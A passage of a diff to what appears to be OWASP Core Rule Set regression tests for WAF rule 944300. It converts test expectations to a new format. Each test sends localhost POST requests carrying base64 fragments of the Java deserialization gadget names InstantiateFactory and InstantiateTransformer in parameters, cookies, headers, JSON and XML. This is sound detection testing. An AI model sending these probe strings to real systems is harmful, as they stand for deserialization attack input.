BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-164 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 164 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-165 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" + output: + log: + expect_ids: [944300] + - test_id: 165 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-166 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 166 desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-167 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 167 desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-168 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" + output: + log: + expect_ids: [944300] + - test_id: 168 desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-169 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 169 desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-170 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 170 desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-171 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 171 desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-172 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 172 desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-173 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 173 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-174 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 174 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-175 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 175 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-176 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" + output: + log: + expect_ids: [944300] + - test_id: 176 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-177 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 177 desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-178 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 178 desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-179 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" + output: + log: + expect_ids: [944300] + - test_id: 179 desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-180 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 180 desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-181 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 181 desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-182 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 182 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-183 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 183 desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-184 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 184 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-185 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 185 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-186 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 186 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-187 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" + output: + log: + expect_ids: [944300] + - test_id: 187 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-188 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 188 desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - 